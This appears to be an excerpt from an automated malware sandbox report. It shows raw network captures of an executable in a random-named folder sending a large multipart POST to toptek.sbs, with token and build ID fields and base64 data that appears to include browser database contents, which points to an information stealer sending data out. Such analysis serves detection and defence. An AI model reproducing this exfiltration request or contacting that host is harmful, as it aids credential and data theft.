                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ni3BLG2YaxvTPTnjQDQTDGRqm1h%2FxZG4%2B19%2Bnrs8PLXpnrcVgrBLCaRz%2F0p7PQWohWjnNoKuE5FB%2FQ50F%2Fp2SmlyeBzFgFS8IiRSUrasuiDeaveVRAps8LQNBC%2Bxis6kFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae62199a942a6-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1596&rtt_var=798&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4202&recv_bytes=945&delivery_rate=288937&cwnd=215&unsent_bytes=0&cid=63530b7c75297ba1&ts=4948&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC236INData Raw: 32 64 31 61 0d 0a 56 4a 47 6d 68 69 63 58 65 70 4a 6f 45 76 68 59 69 65 34 66 49 65 56 46 79 53 2b 55 67 6f 74 53 4e 4f 69 72 33 65 2f 47 43 41 45 76 73 39 43 6b 48 53 4e 57 73 42 74 33 32 6d 4c 39 6e 47 70 45 79 57 65 6f 53 37 61 34 37 54 4e 59 6d 38 37 78 7a 62 42 6c 49 32 37 33 78 2b 70 55 63 6c 61 77 44 57 72 61 59 74 4b 56 50 55 53 4c 5a 2f 4d 4e 38 65 6a 70 4d 31 69 4b 79 72 61 41 74 6d 52 69 50 50 33 42 37 6b 4a 30 48 76 4d 45 66 35 30 39 37 49 39 31 54 34 77 6f 6f 55 4b 32 72 71 6b 33 54 73 71 52 2f 36 4b 6a 66 47 41 5a 38 4e 58 74 42 57 70 57 36 55 70 33 6c 6e 71 7a 7a 48 35 45 68 79 6d 76 53 2f 2f 71 34 7a 70 51 69 38 2b 33 6e 36 39 75 61 54 7a 7a 77 75 39 49 66 51 72 2b 44 6e 69 57 4f 2b
                                                                                                                                                                                                                                                            Data Ascii: 2d1aVJGmhicXepJoEvhYie4fIeVFyS+UgotSNOir3e/GCAEvs9CkHSNWsBt32mL9nGpEyWeoS7a47TNYm87xzbBlI273x+pUclawDWraYtKVPUSLZ/MN8ejpM1iKyraAtmRiPP3B7kJ0HvMEf5097I91T4wooUK2rqk3TsqR/6KjfGAZ8NXtBWpW6Up3lnqzzH5EhymvS//q4zpQi8+3n69uaTzzwu9IfQr+DniWO+
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC1369INData Raw: 61 50 50 51 33 48 49 4c 4d 4e 72 71 43 36 41 6c 57 62 32 4b 71 41 74 47 77 6a 4b 62 33 64 70 45 4a 35 57 4b 68 4b 65 4a 59 30 37 6f 39 79 52 49 59 6e 75 55 4c 32 34 2b 45 34 55 6f 44 47 73 49 4b 71 59 47 51 2b 2b 73 50 72 51 6e 30 65 2f 77 6b 77 31 48 72 73 6c 44 30 62 78 77 65 37 54 76 58 30 35 43 45 57 6c 59 65 6d 7a 61 4e 6d 49 32 36 7a 77 75 70 45 65 42 6a 69 41 6e 75 52 50 2f 6d 48 64 45 36 4b 4a 36 5a 48 2b 65 50 70 4e 31 79 41 78 72 57 4a 71 57 64 6c 4e 76 4f 45 71 67 56 79 41 4c 42 53 4d 4c 6b 2f 2b 34 74 78 56 63 55 64 36 31 4b 34 2b 61 6b 33 57 73 71 52 2f 34 57 68 61 57 41 39 2f 4d 66 73 54 6d 63 59 34 67 78 39 6e 79 6a 74 69 58 4e 4a 68 44 57 68 51 2f 44 6a 34 44 74 66 6a 38 36 37 7a 65 6f 71 5a 43 36 7a 6e 4b 52 6b 65 42 50 38 41 47 65 61 65
                                                                                                                                                                                                                                                            Data Ascii: aPPQ3HILMNrqC6AlWb2KqAtGwjKb3dpEJ5WKhKeJY07o9yRIYnuUL24+E4UoDGsIKqYGQ++sPrQn0e/wkw1HrslD0bxwe7TvX05CEWlYemzaNmI26zwupEeBjiAnuRP/mHdE6KJ6ZH+ePpN1yAxrWJqWdlNvOEqgVyALBSMLk/+4txVcUd61K4+ak3WsqR/4WhaWA9/MfsTmcY4gx9nyjtiXNJhDWhQ/Dj4Dtfj867zeoqZC6znKRkeBP8AGeae
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC1369INData Raw: 44 69 7a 57 6e 52 2f 44 76 35 44 77 57 78 49 6d 34 6c 65 51 79 49 78 7a 77 30 4f 64 50 4e 79 33 7a 42 48 36 64 4c 4b 75 54 4d 31 72 48 49 4b 63 4e 72 71 44 6b 4d 56 36 4d 32 37 43 41 70 32 52 74 4f 66 62 4c 37 45 56 31 46 66 55 4f 65 35 45 35 35 6f 68 76 53 59 63 76 72 6b 7a 38 36 71 6c 2b 46 6f 33 52 2f 39 58 6b 57 33 51 39 73 66 48 6e 53 33 73 66 35 6b 70 76 31 43 4f 72 69 33 45 44 33 32 65 6d 52 66 50 6c 35 6a 46 63 68 4d 79 31 67 61 78 6b 59 43 54 38 77 4f 52 4a 66 52 4c 39 42 48 53 53 4d 2b 43 48 65 30 4f 47 4c 65 73 44 74 75 66 78 63 41 37 4b 2f 62 69 42 71 57 55 68 41 2f 44 4b 36 6b 4a 6a 57 4f 39 45 61 64 6f 39 35 38 77 6c 41 34 73 75 71 30 62 38 35 4f 6b 33 57 34 2f 4b 75 49 36 70 62 57 6b 34 39 4d 44 6f 54 48 67 65 38 41 31 30 6e 79 6a 75 68 58
                                                                                                                                                                                                                                                            Data Ascii: DizWnR/Dv5DwWxIm4leQyIxzw0OdPNy3zBH6dLKuTM1rHIKcNrqDkMV6M27CAp2RtOfbL7EV1FfUOe5E55ohvSYcvrkz86ql+Fo3R/9XkW3Q9sfHnS3sf5kpv1COri3ED32emRfPl5jFchMy1gaxkYCT8wORJfRL9BHSSM+CHe0OGLesDtufxcA7K/biBqWUhA/DK6kJjWO9Eado958wlA4suq0b85Ok3W4/KuI6pbWk49MDoTHge8A10nyjuhX
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC1369INData Raw: 70 56 75 32 2f 36 63 70 46 6f 33 46 2f 39 58 6b 59 32 6f 6b 2f 63 72 74 53 48 4d 51 39 77 52 39 6b 54 7a 67 69 33 70 46 69 69 2b 6d 53 50 58 68 37 54 70 45 69 63 4b 31 67 4b 34 71 4c 58 62 30 33 4b 51 64 4e 54 2f 38 49 32 43 42 4b 50 33 4d 59 67 32 65 5a 36 78 42 74 72 69 70 4d 31 6d 44 78 72 65 46 71 32 56 6e 4f 50 58 43 36 55 42 36 45 75 49 43 66 70 63 78 35 49 64 76 51 34 6f 6a 70 30 6e 2b 36 2b 4e 77 47 4d 72 4f 70 38 33 38 4b 6c 59 37 2f 4d 54 6e 55 7a 55 48 76 68 4d 77 6e 54 61 72 31 44 31 50 69 53 65 6b 51 66 72 72 34 54 46 61 68 4d 36 36 68 4b 78 69 63 54 66 33 7a 4f 56 4c 65 68 6e 30 44 33 57 65 50 65 2b 4b 63 67 50 4a 5a 36 78 56 74 72 69 70 48 33 47 2f 69 35 36 33 35 48 55 74 4c 37 50 44 36 41 55 74 57 50 77 4a 66 4a 49 31 37 59 56 78 53 59 34
                                                                                                                                                                                                                                                            Data Ascii: pVu2/6cpFo3F/9XkY2ok/crtSHMQ9wR9kTzgi3pFii+mSPXh7TpEicK1gK4qLXb03KQdNT/8I2CBKP3MYg2eZ6xBtripM1mDxreFq2VnOPXC6UB6EuICfpcx5IdvQ4ojp0n+6+NwGMrOp838KlY7/MTnUzUHvhMwnTar1D1PiSekQfrr4TFahM66hKxicTf3zOVLehn0D3WePe+KcgPJZ6xVtripH3G/i5635HUtL7PD6AUtWPwJfJI17YVxSY4
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC1369INData Raw: 65 54 71 4e 46 4f 46 79 4c 36 4c 74 6d 31 71 4a 50 33 4a 36 30 31 39 45 66 45 4f 64 5a 63 38 35 34 5a 38 52 49 6b 70 6f 77 32 34 6f 4f 34 6f 46 74 4b 4a 6e 70 32 2f 65 48 55 37 30 73 6e 72 42 57 70 57 36 55 70 33 6c 6e 71 7a 7a 48 52 52 67 79 71 35 52 50 48 75 35 6a 4e 45 69 38 53 30 6e 36 4e 6c 5a 7a 48 2f 77 75 74 44 64 42 33 36 42 6e 65 66 4d 65 53 41 50 51 33 48 49 4c 4d 4e 72 71 44 48 4f 30 57 64 79 72 47 47 73 6e 45 6a 4b 62 33 64 70 45 4a 35 57 4b 68 4b 63 35 45 78 37 34 78 78 51 34 4d 71 71 31 2f 35 35 2b 34 35 58 5a 6a 44 75 49 71 76 59 6d 67 35 39 64 62 6f 53 32 63 64 34 68 67 77 31 48 72 73 6c 44 30 62 78 78 47 73 58 65 62 6a 71 77 46 41 69 64 2b 30 67 4b 67 71 66 48 6a 71 68 4f 4e 4a 4e 55 43 77 44 48 2b 54 4f 65 53 4e 64 45 2b 4b 49 71 4a 49
                                                                                                                                                                                                                                                            Data Ascii: eTqNFOFyL6Ltm1qJP3J6019EfEOdZc854Z8RIkpow24oO4oFtKJnp2/eHU70snrBWpW6Up3lnqzzHRRgyq5RPHu5jNEi8S0n6NlZzH/wutDdB36BnefMeSAPQ3HILMNrqDHO0WdyrGGsnEjKb3dpEJ5WKhKc5Ex74xxQ4Mqq1/55+45XZjDuIqvYmg59dboS2cd4hgw1HrslD0bxxGsXebjqwFAid+0gKgqfHjqhONJNUCwDH+TOeSNdE+KIqJI
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC1369INData Raw: 74 59 75 4d 71 6b 7a 62 73 6b 65 6e 62 30 79 4b 51 64 4e 52 76 33 43 58 47 51 4d 2b 65 44 65 6b 65 56 4c 61 78 66 39 2b 48 69 50 56 71 4b 78 4c 4b 48 70 57 4e 75 4f 76 37 44 34 30 70 77 57 4c 35 4b 64 34 4a 36 73 38 78 63 54 6f 77 72 38 42 65 32 2f 36 63 70 46 6f 33 46 2f 39 58 6b 61 6d 6b 7a 2b 63 6e 6e 53 6e 59 4b 38 51 78 69 6d 6a 66 68 6e 6e 64 49 67 69 71 6d 51 50 58 6d 37 7a 74 61 6d 4d 43 2f 6a 71 38 71 4c 58 62 30 33 4b 51 64 4e 54 76 6e 48 48 71 64 4e 76 32 48 66 45 43 52 4b 72 73 4e 75 4b 44 34 4e 30 66 4b 6b 61 6d 64 73 32 31 38 65 4f 71 45 34 30 6b 31 51 4c 41 4d 65 5a 77 39 37 59 4a 76 52 6f 45 6f 70 45 54 2f 35 4f 45 7a 56 6f 37 4e 75 49 69 6e 5a 6d 67 78 38 4d 76 67 54 48 73 52 2f 30 6f 2b 32 6a 33 7a 7a 43 55 44 70 6a 79 6f 51 66 75 67 39
                                                                                                                                                                                                                                                            Data Ascii: tYuMqkzbskenb0yKQdNRv3CXGQM+eDekeVLaxf9+HiPVqKxLKHpWNuOv7D40pwWL5Kd4J6s8xcTowr8Be2/6cpFo3F/9Xkamkz+cnnSnYK8QximjfhnndIgiqmQPXm7ztamMC/jq8qLXb03KQdNTvnHHqdNv2HfECRKrsNuKD4N0fKkamds218eOqE40k1QLAMeZw97YJvRoEopET/5OEzVo7NuIinZmgx8MvgTHsR/0o+2j3zzCUDpjyoQfug9
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC1369INData Raw: 4a 38 63 32 6a 63 69 4e 75 73 2b 54 76 55 33 41 66 35 6b 68 46 6d 54 54 6c 69 32 73 44 6d 42 6a 6c 44 66 6e 36 71 57 68 76 6b 34 6d 34 67 65 51 79 49 79 50 30 78 4f 4e 66 59 78 2f 38 47 33 75 58 4e 73 6d 44 65 6c 57 45 4b 4b 68 63 2f 36 7a 69 50 52 62 45 69 62 69 56 35 44 49 6a 47 66 54 53 35 32 70 32 43 66 6c 4b 50 74 6f 39 2f 63 77 6c 41 37 6c 6e 75 55 37 6d 34 2b 59 68 61 4d 71 52 70 72 50 6b 59 58 55 78 34 38 66 79 54 6e 67 55 34 54 51 77 77 6d 36 35 33 69 38 52 31 54 6a 72 55 73 6d 75 71 54 45 57 30 76 43 6d 7a 62 49 71 4f 32 53 39 68 50 59 46 4c 56 69 33 43 57 4b 49 50 4f 69 61 66 67 53 35 47 59 78 62 2f 4f 66 35 4e 30 47 46 69 66 48 4e 71 79 6f 37 44 37 50 4e 34 31 35 6b 44 76 30 61 64 39 6f 46 70 63 78 6c 41 39 39 6e 6e 6b 37 34 37 75 34 6d 52 38
                                                                                                                                                                                                                                                            Data Ascii: J8c2jciNus+TvU3Af5khFmTTli2sDmBjlDfn6qWhvk4m4geQyIyP0xONfYx/8G3uXNsmDelWEKKhc/6ziPRbEibiV5DIjGfTS52p2CflKPto9/cwlA7lnuU7m4+YhaMqRprPkYXUx48fyTngU4TQwwm653i8R1TjrUsmuqTEW0vCmzbIqO2S9hPYFLVi3CWKIPOiafgS5GYxb/Of5N0GFifHNqyo7D7PN415kDv0ad9oFpcxlA99nnk747u4mR8
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC1369INData Raw: 70 79 31 64 43 50 4c 4a 36 77 6c 37 45 2f 41 4e 59 49 77 68 70 34 52 2b 57 5a 30 5a 6c 57 62 36 35 75 34 71 55 59 7a 76 6e 38 33 71 4b 6d 78 32 71 2f 32 6b 44 54 55 6e 76 6b 70 6f 32 6d 4b 72 75 58 35 4e 69 53 43 39 58 4c 76 49 79 67 70 73 79 4f 57 34 6d 4f 5a 65 5a 43 62 69 7a 2b 6c 4a 4e 56 61 77 44 44 44 43 61 71 58 4d 65 56 4c 48 66 2f 73 66 72 62 57 36 5a 77 62 59 31 76 47 55 35 48 77 6a 62 71 47 4b 70 46 63 31 51 4c 42 4e 63 34 67 6f 37 59 39 72 51 4d 41 5a 6c 57 72 34 35 2b 67 6d 52 70 33 47 67 62 4f 78 61 57 30 34 39 4e 4c 31 42 54 74 59 2f 30 6f 6f 6f 33 71 6a 7a 45 49 4e 78 7a 2f 72 46 62 62 56 36 6a 35 59 6a 64 2b 75 77 49 4e 6b 5a 44 66 6c 31 50 4e 4b 4e 56 61 77 44 44 44 43 61 4b 58 4d 65 56 4c 48 66 2f 73 66 72 62 57 36 5a 77 62 59 31 76 47
                                                                                                                                                                                                                                                            Data Ascii: py1dCPLJ6wl7E/ANYIwhp4R+WZ0ZlWb65u4qUYzvn83qKmx2q/2kDTUnvkpo2mKruX5NiSC9XLvIygpsyOW4mOZeZCbiz+lJNVawDDDCaqXMeVLHf/sfrbW6ZwbY1vGU5HwjbqGKpFc1QLBNc4go7Y9rQMAZlWr45+gmRp3GgbOxaW049NL1BTtY/0ooo3qjzEINxz/rFbbV6j5Yjd+uwINkZDfl1PNKNVawDDDCaKXMeVLHf/sfrbW6ZwbY1vG
                                                                                                                                                                                                                                                            2024-12-21 21:17:31 UTC1369INData Raw: 52 66 35 31 4f 6c 4b 63 6c 72 51 44 57 61 5a 65 71 58 4d 63 51 50 66 5a 36 70 48 35 75 33 6d 4e 78 71 4e 30 37 6a 4e 36 69 70 74 64 71 75 45 35 55 39 6c 46 66 38 4e 50 4a 77 30 35 63 78 69 44 5a 35 6e 76 51 32 75 73 36 64 77 52 4d 71 52 2f 38 71 6e 65 48 45 77 38 4e 4c 6e 41 6b 73 6d 33 52 68 33 69 6a 6d 70 76 58 42 48 6b 54 4b 6f 58 66 48 65 31 78 31 45 6a 64 6d 38 7a 35 56 38 59 44 62 39 77 36 51 4c 4e 51 43 77 55 6a 43 33 4b 4f 79 63 66 67 50 4a 5a 36 63 4e 72 71 44 6b 49 6c 47 61 79 76 4f 4b 76 6d 30 6a 4b 62 33 64 70 46 4d 31 51 4b 4e 45 4d 49 68 36 73 38 77 36 54 59 6f 6d 71 45 50 31 38 76 73 32 56 5a 7a 4b 2b 4c 4f 61 52 33 45 78 34 38 65 6d 64 48 67 63 35 68 39 7a 69 6a 33 56 73 6c 42 52 67 44 65 6f 44 39 72 6e 35 44 78 6f 74 50 36 75 69 72 51 6f
                                                                                                                                                                                                                                                            Data Ascii: Rf51OlKclrQDWaZeqXMcQPfZ6pH5u3mNxqN07jN6iptdquE5U9lFf8NPJw05cxiDZ5nvQ2us6dwRMqR/8qneHEw8NLnAksm3Rh3ijmpvXBHkTKoXfHe1x1Ejdm8z5V8YDb9w6QLNQCwUjC3KOycfgPJZ6cNrqDkIlGayvOKvm0jKb3dpFM1QKNEMIh6s8w6TYomqEP18vs2VZzK+LOaR3Ex48emdHgc5h9zij3VslBRgDeoD9rn5DxotP6uirQo


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            34192.168.2.44987094.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:27 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----0H4ECB16P8YM7YMGD2V3
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 142457
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:17:27 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 30 48 34 45 43 42 31 36 50 38 59 4d 37 59 4d 47 44 32 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 0d 0a 2d 2d 2d 2d 2d 2d 30 48 34 45 43 42 31 36 50 38 59 4d 37 59 4d 47 44 32 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 30 48 34 45 43 42 31 36 50 38 59 4d 37 59 4d 47 44 32 56 33 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------0H4ECB16P8YM7YMGD2V3Content-Disposition: form-data; name="token"53dbb863fe3c73b662b61cce04832eb2------0H4ECB16P8YM7YMGD2V3Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------0H4ECB16P8YM7YMGD2V3Cont
                                                                                                                                                                                                                                                            2024-12-21 21:17:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:27 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                            Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                            2024-12-21 21:17:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
